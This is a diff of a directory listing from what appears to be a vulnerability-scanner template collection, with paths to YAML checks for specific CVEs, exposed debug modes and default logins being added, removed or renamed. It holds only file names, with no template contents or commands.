./poc/cve/cve-2021-28150-5947.yaml
./poc/cve/cve-2021-28150-5948.yaml
-./poc/cve/cve-2021-28150-5949.yaml
./poc/cve/cve-2021-28150-5950.yaml
./poc/cve/cve-2021-28151-1.yaml
./poc/cve/cve-2021-28151-2.yaml
@@ -41881,6 +41857,7 @@
./poc/cve/cve-2021-28169-5961.yaml
./poc/cve/cve-2021-28169-5962.yaml
./poc/cve/cve-2021-28169-5963.yaml
+./poc/cve/cve-2021-28377(1).yaml
./poc/cve/cve-2021-28377-5964.yaml
./poc/cve/cve-2021-28377-5965.yaml
./poc/cve/cve-2021-28377-5966.yaml
@@ -41895,6 +41872,7 @@
./poc/cve/cve-2021-28918-2.yaml
./poc/cve/cve-2021-28918-3.yaml
./poc/cve/cve-2021-28918-5974.yaml
+./poc/cve/cve-2021-28918-5975.yaml
./poc/cve/cve-2021-28918-5976.yaml
./poc/cve/cve-2021-28937-5977.yaml
./poc/cve/cve-2021-28937-5978.yaml
@@ -41933,6 +41911,7 @@
./poc/cve/cve-2021-29484-6008.yaml
./poc/cve/cve-2021-29490-6009.yaml
./poc/cve/cve-2021-29490-6010.yaml
+./poc/cve/cve-2021-29490-6011.yaml
./poc/cve/cve-2021-29622-6012.yaml
./poc/cve/cve-2021-29622-6013.yaml
./poc/cve/cve-2021-29622-6014.yaml
@@ -41941,7 +41920,6 @@
./poc/cve/cve-2021-29622-6017.yaml
./poc/cve/cve-2021-29622-6018.yaml
./poc/cve/cve-2021-29622-6019.yaml
-./poc/cve/cve-2021-29622.yaml
./poc/cve/cve-2021-29625-6020.yaml
./poc/cve/cve-2021-29625-6021.yaml
./poc/cve/cve-2021-29625-6022.yaml
@@ -41979,6 +41957,7 @@
./poc/cve/cve-2021-30461-6055.yaml
./poc/cve/cve-2021-30461-6056.yaml
./poc/cve/cve-2021-30461-6057.yaml
+./poc/cve/cve-2021-30461.yaml
./poc/cve/cve-2021-30497-6058.yaml
./poc/cve/cve-2021-30497-6059.yaml
./poc/cve/cve-2021-30497-6060.yaml
@@ -41989,7 +41968,6 @@
./poc/cve/cve-2021-31249-6065.yaml
./poc/cve/cve-2021-31249-6066.yaml
./poc/cve/cve-2021-31249-6067.yaml
-./poc/cve/cve-2021-31249-6068.yaml
./poc/cve/cve-2021-31249-6069.yaml
./poc/cve/cve-2021-31250-6071.yaml
./poc/cve/cve-2021-31250-6072.yaml
@@ -42002,7 +41980,6 @@
./poc/cve/cve-2021-3129-6080.yaml
./poc/cve/cve-2021-3129-6081.yaml
./poc/cve/cve-2021-3129-6082.yaml
-./poc/cve/cve-2021-3129.yaml
./poc/cve/cve-2021-31537-6083.yaml
./poc/cve/cve-2021-31537-6084.yaml
./poc/cve/cve-2021-31537-6085.yaml
@@ -42016,6 +41993,7 @@
./poc/cve/cve-2021-31581-6092.yaml
./poc/cve/cve-2021-31581-6093.yaml
./poc/cve/cve-2021-31581-6094.yaml
+./poc/cve/cve-2021-31589-6095.yaml
./poc/cve/cve-2021-31589-6096.yaml
./poc/cve/cve-2021-31602-1.yaml
./poc/cve/cve-2021-31602-2.yaml
@@ -42024,7 +42002,6 @@
./poc/cve/cve-2021-31602-6099.yaml
./poc/cve/cve-2021-31602-6100.yaml
./poc/cve/cve-2021-31682-6101.yaml
-./poc/cve/cve-2021-31682-6102.yaml
./poc/cve/cve-2021-31682-6103.yaml
./poc/cve/cve-2021-31682-6104.yaml
./poc/cve/cve-2021-31755-6105.yaml
@@ -42036,7 +42013,6 @@
./poc/cve/cve-2021-31800-6111.yaml
./poc/cve/cve-2021-31800-6112.yaml
./poc/cve/cve-2021-31800-6113.yaml
-./poc/cve/cve-2021-31805(1).yaml
./poc/cve/cve-2021-31856-6114.yaml
./poc/cve/cve-2021-31856-6115.yaml
./poc/cve/cve-2021-31856-6116.yaml
@@ -42049,7 +42025,6 @@
./poc/cve/cve-2021-32030-6123.yaml
./poc/cve/cve-2021-32172-6125.yaml
./poc/cve/cve-2021-32172-6126.yaml
-./poc/cve/cve-2021-3223(1).yaml
./poc/cve/cve-2021-3223-6127.yaml
./poc/cve/cve-2021-3223-6128.yaml
./poc/cve/cve-2021-3223-6129.yaml
@@ -42057,6 +42032,7 @@
./poc/cve/cve-2021-3223-6131.yaml
./poc/cve/cve-2021-3223-6132.yaml
./poc/cve/cve-2021-32305-6133.yaml
+./poc/cve/cve-2021-32305-6134.yaml
./poc/cve/cve-2021-32305-6135.yaml
./poc/cve/cve-2021-32305-6136.yaml
./poc/cve/cve-2021-32618-6137.yaml
@@ -42097,6 +42073,7 @@
./poc/cve/cve-2021-33357-6173.yaml
./poc/cve/cve-2021-33357-6174.yaml
./poc/cve/cve-2021-33357-6175.yaml
+./poc/cve/cve-2021-33544-6176.yaml
./poc/cve/cve-2021-33544-6177.yaml
./poc/cve/cve-2021-33544-6178.yaml
./poc/cve/cve-2021-33544-6179.yaml
@@ -42131,6 +42108,7 @@
./poc/cve/cve-2021-33807-6208.yaml
./poc/cve/cve-2021-33807-6209.yaml
./poc/cve/cve-2021-33807-6210.yaml
+./poc/cve/cve-2021-33807-6211.yaml
./poc/cve/cve-2021-33904-6212.yaml
./poc/cve/cve-2021-33904-6213.yaml
./poc/cve/cve-2021-33904-6214.yaml
@@ -42140,6 +42118,7 @@
./poc/cve/cve-2021-34370-6218.yaml
./poc/cve/cve-2021-34370-6219.yaml
./poc/cve/cve-2021-34370-6220.yaml
+./poc/cve/cve-2021-34370-6221.yaml
./poc/cve/cve-2021-34429-1.yaml
./poc/cve/cve-2021-34429-2.yaml
./poc/cve/cve-2021-34429-6222.yaml
@@ -42160,7 +42139,6 @@
./poc/cve/cve-2021-34621-6235.yaml
./poc/cve/cve-2021-34640-6236.yaml
./poc/cve/cve-2021-34640-6237.yaml
-./poc/cve/cve-2021-34643-6238.yaml
./poc/cve/cve-2021-34643-6239.yaml
./poc/cve/cve-2021-34805-6240.yaml
./poc/cve/cve-2021-34805-6241.yaml
@@ -42169,7 +42147,6 @@
./poc/cve/cve-2021-35265-1.yaml
./poc/cve/cve-2021-35265-2.yaml
./poc/cve/cve-2021-35265-6244.yaml
-./poc/cve/cve-2021-35265-6245.yaml
./poc/cve/cve-2021-35265-6246.yaml
./poc/cve/cve-2021-35336-6247.yaml
./poc/cve/cve-2021-35336-6248.yaml
@@ -42189,6 +42166,7 @@
./poc/cve/cve-2021-36260-6262.yaml
./poc/cve/cve-2021-36260-6263.yaml
./poc/cve/cve-2021-36260-6264.yaml
+./poc/cve/cve-2021-36356(1).yaml
./poc/cve/cve-2021-36380-6266.yaml
./poc/cve/cve-2021-36380-6267.yaml
./poc/cve/cve-2021-36450(1).yaml
@@ -42204,9 +42182,9 @@
./poc/cve/cve-2021-36749-6277.yaml
./poc/cve/cve-2021-36749-6278.yaml
./poc/cve/cve-2021-36749-6279.yaml
-./poc/cve/cve-2021-37216-6280.yaml
./poc/cve/cve-2021-37216-6281.yaml
./poc/cve/cve-2021-37216-6282.yaml
+./poc/cve/cve-2021-37416(1).yaml
./poc/cve/cve-2021-37538-6283.yaml
./poc/cve/cve-2021-37538-6284.yaml
./poc/cve/cve-2021-37538-6285.yaml
@@ -42216,6 +42194,7 @@
./poc/cve/cve-2021-37573-6289.yaml
./poc/cve/cve-2021-37573-6290.yaml
./poc/cve/cve-2021-37580-6291.yaml
+./poc/cve/cve-2021-37580-6292.yaml
./poc/cve/cve-2021-37589(1).yaml
./poc/cve/cve-2021-37704-2.yaml
./poc/cve/cve-2021-37704-6293.yaml
@@ -42244,17 +42223,19 @@
./poc/cve/cve-2021-38702-6311.yaml
./poc/cve/cve-2021-38702-6312.yaml
./poc/cve/cve-2021-38702-6313.yaml
+./poc/cve/cve-2021-38702-6314.yaml
./poc/cve/cve-2021-38704-6315.yaml
./poc/cve/cve-2021-38704-6316.yaml
-./poc/cve/cve-2021-38704-6317.yaml
./poc/cve/cve-2021-38704-6318.yaml
./poc/cve/cve-2021-38751-6319.yaml
+./poc/cve/cve-2021-38751-6320.yaml
./poc/cve/cve-2021-38751-6321.yaml
./poc/cve/cve-2021-38751-6322.yaml
+./poc/cve/cve-2021-39211(1).yaml
+./poc/cve/cve-2021-39226-6323.yaml
./poc/cve/cve-2021-39226-6324.yaml
./poc/cve/cve-2021-39226-6325.yaml
./poc/cve/cve-2021-39226-6326.yaml
-./poc/cve/cve-2021-39312(1).yaml
./poc/cve/cve-2021-39312-6327.yaml
./poc/cve/cve-2021-39316-6328.yaml
./poc/cve/cve-2021-39316-6329.yaml
@@ -42375,7 +42356,6 @@
./poc/cve/cve-2021-41467-6440.yaml
./poc/cve/cve-2021-41467-6441.yaml
./poc/cve/cve-2021-41467-6442.yaml
-./poc/cve/cve-2021-41569(1).yaml
./poc/cve/cve-2021-41569-6443.yaml
./poc/cve/cve-2021-41569-6444.yaml
./poc/cve/cve-2021-41648-6445.yaml
@@ -42392,7 +42372,6 @@
./poc/cve/cve-2021-41653-6457.yaml
./poc/cve/cve-2021-41653-6458.yaml
./poc/cve/cve-2021-41691-6459.yaml
-./poc/cve/cve-2021-41691-6460.yaml
./poc/cve/cve-2021-41691-6461.yaml
./poc/cve/cve-2021-41773-6462.yaml
./poc/cve/cve-2021-41773-6463.yaml
@@ -42479,7 +42458,6 @@
./poc/cve/cve-2021-43810-6541.yaml
./poc/cve/cve-2021-43810-6542.yaml
./poc/cve/cve-2021-44077-6543.yaml
-./poc/cve/cve-2021-44103(1).yaml
./poc/cve/cve-2021-44103-6544.yaml
./poc/cve/cve-2021-44228-6545.yaml
./poc/cve/cve-2021-44228-6546.yaml
@@ -42492,6 +42470,8 @@
./poc/cve/cve-2021-44451-6553.yaml
./poc/cve/cve-2021-44515-6554.yaml
./poc/cve/cve-2021-44521-6555.yaml
+./poc/cve/cve-2021-44521-6556.yaml
+./poc/cve/cve-2021-44528(1).yaml
./poc/cve/cve-2021-44528-6557.yaml
./poc/cve/cve-2021-44528-6558.yaml
./poc/cve/cve-2021-44528-6559.yaml
@@ -42521,10 +42501,10 @@
./poc/cve/cve-2021-45380-6582.yaml
./poc/cve/cve-2021-45380-6583.yaml
./poc/cve/cve-2021-45380-6584.yaml
+./poc/cve/cve-2021-45428(1).yaml
./poc/cve/cve-2021-45967-6585.yaml
./poc/cve/cve-2021-45967-6586.yaml
./poc/cve/cve-2021-45968-6587.yaml
-./poc/cve/cve-2021-45968-6588.yaml
./poc/cve/cve-2021-45968-6589.yaml
./poc/cve/cve-2021-46005-6590.yaml
./poc/cve/cve-2021-46005-6591.yaml
@@ -42533,12 +42513,13 @@
./poc/cve/cve-2021-46379-6594.yaml
./poc/cve/cve-2021-46379-6595.yaml
./poc/cve/cve-2021-46381-6596.yaml
-./poc/cve/cve-2021-46381-6597.yaml
./poc/cve/cve-2021-46381-6598.yaml
./poc/cve/cve-2021-46381-6599.yaml
./poc/cve/cve-2021-46387-6600.yaml
./poc/cve/cve-2021-46387-6601.yaml
+./poc/cve/cve-2021-46417(1).yaml
./poc/cve/cve-2021-46417-6602.yaml
+./poc/cve/cve-2021-46422(1).yaml
./poc/cve/cve-2021-46424(1).yaml
./poc/cve/cve-2022-0140-6603.yaml
./poc/cve/cve-2022-0148-6604.yaml
@@ -42550,7 +42531,6 @@
./poc/cve/cve-2022-0189-6610.yaml
./poc/cve/cve-2022-0189-6611.yaml
./poc/cve/cve-2022-0201(1).yaml
-./poc/cve/cve-2022-0208(1).yaml
./poc/cve/cve-2022-0218-6612.yaml
./poc/cve/cve-2022-0218-6613.yaml
./poc/cve/cve-2022-0218-6614.yaml
@@ -42576,10 +42556,11 @@
./poc/cve/cve-2022-0482-6633.yaml
./poc/cve/cve-2022-0482-6634.yaml
./poc/cve/cve-2022-0540(1).yaml
-./poc/cve/cve-2022-0543(1).yaml
./poc/cve/cve-2022-0543-6635.yaml
./poc/cve/cve-2022-0591-6636.yaml
./poc/cve/cve-2022-0591-6637.yaml
+./poc/cve/cve-2022-0594(1).yaml
+./poc/cve/cve-2022-0599(1).yaml
./poc/cve/cve-2022-0653-6638.yaml
./poc/cve/cve-2022-0653-6639.yaml
./poc/cve/cve-2022-0653-6640.yaml
@@ -42591,37 +42572,32 @@
./poc/cve/cve-2022-0692-6646.yaml
./poc/cve/cve-2022-0776(1).yaml
./poc/cve/cve-2022-0870(1).yaml
-./poc/cve/cve-2022-0968(1).yaml
-./poc/cve/cve-2022-1020(1).yaml
+./poc/cve/cve-2022-0952(1).yaml
./poc/cve/cve-2022-1040(1).yaml
./poc/cve/cve-2022-1040-6647.yaml
./poc/cve/cve-2022-1054(1).yaml
./poc/cve/cve-2022-1119-6648.yaml
-./poc/cve/cve-2022-1221(1).yaml
./poc/cve/cve-2022-1386(1).yaml
./poc/cve/cve-2022-1388-6649.yaml
./poc/cve/cve-2022-1388-6650.yaml
./poc/cve/cve-2022-1388.yaml
+./poc/cve/cve-2022-1392(1).yaml
./poc/cve/cve-2022-1392-6651.yaml
./poc/cve/cve-2022-1439(1).yaml
-./poc/cve/cve-2022-1597(1).yaml
./poc/cve/cve-2022-1597-6652.yaml
./poc/cve/cve-2022-1598-6653.yaml
./poc/cve/cve-2022-1598-6654.yaml
./poc/cve/cve-2022-1609-6655.yaml
-./poc/cve/cve-2022-1713(1).yaml
./poc/cve/cve-2022-1713-6656.yaml
-./poc/cve/cve-2022-1815(1).yaml
-./poc/cve/cve-2022-1904(1).yaml
-./poc/cve/cve-2022-1937(1).yaml
+./poc/cve/cve-2022-1906(1).yaml
./poc/cve/cve-2022-21371-6657.yaml
./poc/cve/cve-2022-21371-6658.yaml
./poc/cve/cve-2022-21371-6659.yaml
./poc/cve/cve-2022-21500(1).yaml
./poc/cve/cve-2022-21500-6660.yaml
-./poc/cve/cve-2022-21705(1).yaml
+./poc/cve/cve-2022-2187(1).yaml
./poc/cve/cve-2022-22536-6661.yaml
-./poc/cve/cve-2022-2290(1).yaml
+./poc/cve/cve-2022-22536-6662.yaml
./poc/cve/cve-2022-22947-6663.yaml
./poc/cve/cve-2022-22947-6664.yaml
./poc/cve/cve-2022-22947-6665.yaml
@@ -42636,6 +42612,7 @@
./poc/cve/cve-2022-22965-6674.yaml
./poc/cve/cve-2022-22965-6675.yaml
./poc/cve/cve-2022-22965-6676.yaml
+./poc/cve/cve-2022-22972(1).yaml
./poc/cve/cve-2022-22972-6677.yaml
./poc/cve/cve-2022-23131-6678.yaml
./poc/cve/cve-2022-23131-6679.yaml
@@ -42671,12 +42648,10 @@
./poc/cve/cve-2022-24288-6710.yaml
./poc/cve/cve-2022-24288-6711.yaml
./poc/cve/cve-2022-24288-6712.yaml
-./poc/cve/cve-2022-24681(1).yaml
./poc/cve/cve-2022-24856(1).yaml
./poc/cve/cve-2022-24856-6713.yaml
-./poc/cve/cve-2022-2487(1).yaml
+./poc/cve/cve-2022-2486(1).yaml
./poc/cve/cve-2022-2488(1).yaml
-./poc/cve/cve-2022-24899(1).yaml
./poc/cve/cve-2022-24900-6714.yaml
./poc/cve/cve-2022-24990-6715.yaml
./poc/cve/cve-2022-24990-6716.yaml
@@ -42687,11 +42662,10 @@
./poc/cve/cve-2022-25323-6721.yaml
./poc/cve/cve-2022-25323-6722.yaml
./poc/cve/cve-2022-25323-6723.yaml
-./poc/cve/cve-2022-25323-6724.yaml
./poc/cve/cve-2022-25369-6725.yaml
./poc/cve/cve-2022-25369-6726.yaml
./poc/cve/cve-2022-25369-6727.yaml
-./poc/cve/cve-2022-26134(1).yaml
+./poc/cve/cve-2022-26135(1).yaml
./poc/cve/cve-2022-26138(1).yaml
./poc/cve/cve-2022-26138-6728.yaml
./poc/cve/cve-2022-26148-6729.yaml
@@ -42702,26 +42676,22 @@
./poc/cve/cve-2022-26233-6734.yaml
./poc/cve/cve-2022-26233-6735.yaml
./poc/cve/cve-2022-26233-6736.yaml
-./poc/cve/cve-2022-26352(1).yaml
./poc/cve/cve-2022-26352-6737.yaml
./poc/cve/cve-2022-26352-6738.yaml
-./poc/cve/cve-2022-26564(1).yaml
./poc/cve/cve-2022-26564-6739.yaml
+./poc/cve/cve-2022-26960(1).yaml
./poc/cve/cve-2022-27849-6740.yaml
./poc/cve/cve-2022-27849-6741.yaml
-./poc/cve/cve-2022-27927(1).yaml
+./poc/cve/cve-2022-28079(1).yaml
./poc/cve/cve-2022-28079-6742.yaml
-./poc/cve/cve-2022-28080(1).yaml
./poc/cve/cve-2022-28080-6743.yaml
./poc/cve/cve-2022-28219(1).yaml
./poc/cve/cve-2022-28363-6744.yaml
./poc/cve/cve-2022-28363-6745.yaml
./poc/cve/cve-2022-28365-6746.yaml
./poc/cve/cve-2022-28365-6747.yaml
-./poc/cve/cve-2022-29014(1).yaml
./poc/cve/cve-2022-29014-6748.yaml
./poc/cve/cve-2022-29298-6749.yaml
-./poc/cve/cve-2022-29299(1).yaml
./poc/cve/cve-2022-29303-6750.yaml
./poc/cve/cve-2022-29303-6751.yaml
./poc/cve/cve-2022-29303-6752.yaml
@@ -42729,37 +42699,41 @@
./poc/cve/cve-2022-29455(1).yaml
./poc/cve/cve-2022-29455.yaml
./poc/cve/cve-2022-29464-6753.yaml
+./poc/cve/cve-2022-29548(1).yaml
./poc/cve/cve-2022-29548-6754.yaml
-./poc/cve/cve-2022-30073(1).yaml
+./poc/cve/cve-2022-30489(1).yaml
./poc/cve/cve-2022-30525(1).yaml
./poc/cve/cve-2022-30525-6755.yaml
-./poc/cve/cve-2022-30776(1).yaml
+./poc/cve/cve-2022-30777(1).yaml
./poc/cve/cve-2022-31268(1).yaml
./poc/cve/cve-2022-31268-6756.yaml
./poc/cve/cve-2022-31268-6757.yaml
-./poc/cve/cve-2022-32007(1).yaml
./poc/cve/cve-2022-32015(1).yaml
./poc/cve/cve-2022-32018(1).yaml
./poc/cve/cve-2022-32022(1).yaml
-./poc/cve/cve-2022-32025(1).yaml
./poc/cve/cve-2022-32026(1).yaml
+./poc/cve/cve-2022-32028(1).yaml
./poc/cve/cve-2022-32159(1).yaml
./poc/cve/cve-2022-32159.yaml
+./poc/cve/cve-2022-32409(1).yaml
./poc/cve/cve-2022-32409-6758.yaml
./poc/cve/cve-2022-32444-6759.yaml
./poc/cve/cve-2022-32444-6760.yaml
+./poc/cve/cve-2022-33119(1).yaml
./poc/cve/cve-2022-33174(1).yaml
./poc/cve/cve-2022-33174-6761.yaml
+./poc/cve/cve-2022-34046(1).yaml
./poc/cve/cve-2022-34046-6762.yaml
-./poc/cve/cve-2022-34047(1).yaml
./poc/cve/cve-2022-34047-6763.yaml
-./poc/cve/cve-2022-35416(1).yaml
+./poc/cve/cve-2022-34048(1).yaml
+./poc/cve/cve-2022-34049(1).yaml
./poc/cve/cve-2022-36883(1).yaml
./poc/cve/cve-2022-40684(1).yaml
./poc/cve/cve-2022-42889.yaml
./poc/cve/cve-2023-2523.yaml
./poc/cve/cve-2023-33246.yaml
./poc/cve/cve-2023-34039.yaml
+./poc/cve/cve-2024-23334.yaml
./poc/cve/cve-annotate.yml
./poc/cve/cve2json.yml
./poc/cve/cve_rce2-1.yaml
@@ -42874,7 +42848,7 @@
./poc/cve/rce-CVE-2021-21224.yaml
./poc/cve/rconfig-cve-2019-16663.yml
./poc/cve/resin-cnnvd-200705-315-9865.yaml
-./poc/cve/resin-cnnvd-200705-315-9866.yaml
+./poc/cve/resin-cnnvd-200705-315-9867.yaml
./poc/cve/resin-cnnvd-200705-315.yaml
./poc/cve/resin-cnnvd-200705-315.yml
./poc/cve/ruijie-eweb-rce-cnvd-2021-09650.yml
@@ -42893,6 +42867,7 @@
./poc/cve/spring-cloud-cve-2020-5410.yml
./poc/cve/spring-cve-2016-4977.yaml
./poc/cve/spring-cve-2016-4977.yml
+./poc/cve/springForShell-CVE-2022-22963.yaml
./poc/cve/springForShell-CVE-2022-22965.yaml
./poc/cve/spring_cloud_gateway_CVE_2022_22947.yaml
./poc/cve/spring_cloud_gateway_cve_2022_22947.yaml
@@ -42935,29 +42910,29 @@
./poc/cve/zimbra-cve-2019-9670-xxe.yml
./poc/debug/Django-DebugMode.yaml
./poc/debug/TopApp-AD_enable_tool_debug_php-RCE.yaml
+./poc/debug/airflow-debug-231.yaml
./poc/debug/airflow-debug-232.yaml
-./poc/debug/airflow-debug-233.yaml
./poc/debug/airflow-debug.yaml
./poc/debug/ampache-debug-page.yaml
./poc/debug/android-debug-database-exposed-312.yaml
./poc/debug/android-debug-database-exposed-313.yaml
+./poc/debug/android-debug-database-exposed-314.yaml
./poc/debug/android-debug-database-exposed-315.yaml
-./poc/debug/android-debug-database-exposed-316.yaml
./poc/debug/android-debug-database-exposed.yaml
./poc/debug/android-manifest-debuggable-enabled.yaml
+./poc/debug/aspx-debug-mode-575.yaml
./poc/debug/aspx-debug-mode-576.yaml
./poc/debug/aspx-debug-mode-577.yaml
-./poc/debug/aspx-debug-mode-578.yaml
./poc/debug/aspx-debug-mode-579.yaml
./poc/debug/bitrix-debug-file.yaml
+./poc/debug/browserless-debugger-794.yaml
./poc/debug/browserless-debugger-795.yaml
-./poc/debug/browserless-debugger.yaml
./poc/debug/checkGoDebug.yaml
./poc/debug/coldfusion-debug-xss-1.yaml
./poc/debug/coldfusion-debug-xss-1152.yaml
+./poc/debug/coldfusion-debug-xss-1153.yaml
./poc/debug/coldfusion-debug-xss-1154.yaml
./poc/debug/coldfusion-debug-xss-2.yaml
-./poc/debug/coldfusion-debug-xss.yaml
./poc/debug/configure-service-timestamps-debug.yaml
./poc/debug/debug-3c7881aeda959430760389337ec81437.yaml
./poc/debug/debug-assistant-2f45650a91c72711c9ed905e46c42126.yaml
@@ -42972,7 +42947,8 @@
./poc/debug/debug-bar-elasticpress-plugin.yaml
./poc/debug/debug-bar-elasticpress.yaml
./poc/debug/debug-bar.yaml
-./poc/debug/debug-enabled-6788.yaml
+./poc/debug/debug-enabled-6789.yaml
+./poc/debug/debug-enabled-6790.yaml
./poc/debug/debug-enabled.yaml
./poc/debug/debug-functions-time-2df258451ffd3064fdb981dedfeff909.yaml
./poc/debug/debug-functions-time-d41d8cd98f00b204e9800998ecf8427e.yaml
@@ -43003,6 +42979,7 @@
./poc/debug/django-debug-detect.yaml
./poc/debug/django-debug-enable.yaml
./poc/debug/django-debug-enabled.yaml
+./poc/debug/django-debug-exposed-404.yaml
./poc/debug/django-debug-exposure-7028.yaml
./poc/debug/django-debug-exposure-7029.yaml
./poc/debug/django-debug-exposure-7030.yaml
@@ -43032,10 +43009,8 @@
./poc/debug/lanhaizhuoyue-debug-rce.yaml
./poc/debug/laravel-debug-enabled-8574.yaml
./poc/debug/laravel-debug-enabled-8575.yaml
-./poc/debug/laravel-debug-enabled-8576.yaml
./poc/debug/laravel-debug-enabled-8577.yaml
./poc/debug/laravel-debug-enabled-8578.yaml
-./poc/debug/laravel-debug-enabled.yaml
./poc/debug/laravel-debug-error-8579.yaml
./poc/debug/laravel-debug-error.yaml
./poc/debug/laravel-debug-info-leak.yaml
@@ -43056,7 +43031,7 @@
./poc/debug/pyramid-debug-toolbar-9741.yaml
./poc/debug/pyramid-debug-toolbar.yaml
./poc/debug/rails-debug-mode-9805.yaml
-./poc/debug/rails-debug-mode-9807.yaml
+./poc/debug/rails-debug-mode-9806.yaml
./poc/debug/rails-debug-mode.yaml
./poc/debug/sitecore-debug-page-10285.yaml
./poc/debug/sitecore-debug-page.yaml
@@ -43067,6 +43042,7 @@
./poc/debug/symfony-debug.yaml
./poc/debug/symfony-debugmode-10618.yaml
./poc/debug/symfony-debugmode-10619.yaml
+./poc/debug/symfony-debugmode-10620.yaml
./poc/debug/symfony-debugmode-10621.yaml
./poc/debug/symfony-debugmode-10623.yaml
./poc/debug/symfony-debugmode.yaml
@@ -43076,6 +43052,7 @@
./poc/debug/wamp-xdebug-detect-11101.yaml
./poc/debug/wamp-xdebug-detect-11102.yaml
./poc/debug/wamp-xdebug-detect-11103.yaml
+./poc/debug/wamp-xdebug-detect-11104.yaml
./poc/debug/wamp-xdebug-detect.yaml
./poc/debug/wamp-xdebug.yaml
./poc/debug/werkzeug-debug.yaml
@@ -43085,7 +43062,7 @@
./poc/debug/werkzeug-debugger-detect.yaml
./poc/debug/wordpress-debug-log-11256.yaml
./poc/debug/wordpress-debug-log-11257.yaml
-./poc/debug/wordpress-debug-log-11258.yaml
+./poc/debug/wordpress-debug-log-11259.yaml
./poc/debug/wordpress-debug-log.yaml
./poc/debug/wp-debug-log.yaml
./poc/debug/wp-debugging-0c12452c85fb9700ac837eef51c78541.yaml
@@ -43113,18 +43090,18 @@
./poc/default/JeeSite-default-login.yaml
./poc/default/Kingsoft-default-login.yaml
./poc/default/Konga-default-login.yaml
+./poc/default/Mantis-Default_login.yaml
./poc/default/MinIO-default-login.yaml
./poc/default/NagiosXI-CMS-Default-Login.yaml
./poc/default/PFSense-Default-Login.yaml
./poc/default/PRTGNetwork-DefaultLogin.yaml
-./poc/default/Redmine-Default-Login.yaml
./poc/default/TestLink-Default-Login.yaml
./poc/default/UniFi-Default-Login.yaml
./poc/default/ZoneMinder-Default-Login.yaml
-./poc/default/activemq-default-login-44.yaml
./poc/default/activemq-default-login-45.yaml
./poc/default/activemq-default-login-46.yaml
./poc/default/activemq-default-login-47.yaml
+./poc/default/activemq-default-login-48.yaml
./poc/default/activemq-default-password.yaml
./poc/default/activemq-default-password.yml
./poc/default/adobe-aem-default-credentials-1.yaml
@@ -43142,8 +43119,8 @@
./poc/default/aem-default-get-servlet-11.yaml
./poc/default/aem-default-get-servlet-12.yaml
./poc/default/aem-default-get-servlet-13.yaml
+./poc/default/aem-default-get-servlet-135.yaml
./poc/default/aem-default-get-servlet-136.yaml
-./poc/default/aem-default-get-servlet-137.yaml
./poc/default/aem-default-get-servlet-139.yaml
./poc/default/aem-default-get-servlet-14.yaml
./poc/default/aem-default-get-servlet-15.yaml
@@ -43197,7 +43174,6 @@
./poc/default/aem-default-get-servlet-8.yaml
./poc/default/aem-default-get-servlet-9.yaml
./poc/default/aem-default-get-servlet.yaml
-./poc/default/aem-default-login-140.yaml
./poc/default/aem-default-login-141.yaml
./poc/default/aem-default-login-142.yaml
./poc/default/airflow-default-credentials.yaml
@@ -43208,11 +43184,10 @@
./poc/default/alibaba-canal-default-password.yml
./poc/default/alphaweb-default-login-276.yaml
./poc/default/alphaweb-default-login-277.yaml
-./poc/default/alphaweb-default-login.yaml
./poc/default/ambari-default-credentials-286.yaml
./poc/default/ambari-default-credentials.yaml
-./poc/default/ambari-default-login-287.yaml
./poc/default/ambari-default-login-288.yaml
+./poc/default/ambari-default-login-289.yaml
./poc/default/ambari-default-login-290.yaml
./poc/default/ambari-default-password.yaml
./poc/default/ampjuke-default-login.yaml
@@ -43222,8 +43197,7 @@
./poc/default/apisix-default-login-491.yaml
./poc/default/apisix-default-login-492.yaml
./poc/default/apollo-default-login-520.yaml
-./poc/default/apollo-default-login-521.yaml
-./poc/default/arl-default-login-537.yaml
+./poc/default/apollo-default-login.yaml
./poc/default/arl-default-login-538.yaml
./poc/default/arl-default-login-539.yaml
./poc/default/arl-default-login-540.yaml
@@ -43241,9 +43215,9 @@
./poc/default/axis2-default-password.yaml
./poc/default/azkaban-default-login-671.yaml
./poc/default/azkaban-default-login-672.yaml
-./poc/default/azkaban-default-login-673.yaml
./poc/default/azkaban-default-login-674.yaml
./poc/default/azkaban-default-login-675.yaml
+./poc/default/azkaban-default-login.yaml
./poc/default/azkaban-default-password.yaml
./poc/default/azkaban-web-client-default-creds.yaml
./poc/default/azure-default-page.yaml
@@ -43253,13 +43227,12 @@
./poc/default/businessintelligence-default-login-816.yaml
./poc/default/businessintelligence-default-login-817.yaml
./poc/default/cambium-networks-default-login.yaml
+./poc/default/canal-default-login-846.yaml
./poc/default/canal-default-login-847.yaml
./poc/default/canal-default-login-848.yaml
-./poc/default/canal-default-login-849.yaml
./poc/default/canal-default-login.yaml
./poc/default/change-default-login-logo-url-and-title-fef61a56dbdca375b6c1f6da9b2473d7.yaml
./poc/default/change-default-login-logo-url-and-title.yaml
-./poc/default/chinaunicom-default-login-906.yaml
./poc/default/chinaunicom-default-login-907.yaml
./poc/default/chinaunicom-default-login-908.yaml
./poc/default/chinaunicom-default-login-909.yaml
@@ -43270,13 +43243,13 @@
./poc/default/ciphertrust-default-password-vulnerability.yaml
./poc/default/circarlife-default-login.yaml
./poc/default/cnzxsoft-information-security-management-system-default-account.yaml
-./poc/default/cobbler-default-login-1119.yaml
+./poc/default/cobbler-default-login-1118.yaml
./poc/default/cobbler-default-login-1120.yaml
./poc/default/cobbler-default-login-1121.yaml
-./poc/default/cobbler-default-login.yaml
./poc/default/control4-default-login.yaml
./poc/default/corero-cms-default-login.yaml
./poc/default/corero-swa-default-login.yaml
+./poc/default/crushftp-default-login.yaml
./poc/default/cs141-default-login-1.yaml
./poc/default/cs141-default-login-1277.yaml
./poc/default/cs141-default-login-1279.yaml
@@ -43291,7 +43264,6 @@
./poc/default/default-apache-test-all-6812.yaml
./poc/default/default-apache-test-all-6813.yaml
./poc/default/default-apache-test-all-6814.yaml
-./poc/default/default-apache-test-all.yaml
./poc/default/default-apache-test-page-6816.yaml
./poc/default/default-apache-test-page-6817.yaml
./poc/default/default-apache-test-page-6818.yaml
@@ -43304,13 +43276,11 @@
./poc/default/default-apache2-ubuntu-page-6809.yaml
./poc/default/default-apache2-ubuntu-page-6810.yaml
./poc/default/default-apache2-ubuntu-page-6811.yaml
-./poc/default/default-apache2-ubuntu-page.yaml
./poc/default/default-asp-6823.yaml
./poc/default/default-asp-net-page-6820.yaml
./poc/default/default-asp-net-page-6822.yaml
./poc/default/default-asp-net-page-6824.yaml
./poc/default/default-asp-net-page-6825.yaml
-./poc/default/default-asp-net-page.yaml
./poc/default/default-asp.net-page.yaml
./poc/default/default-centos-test-page-6826.yaml
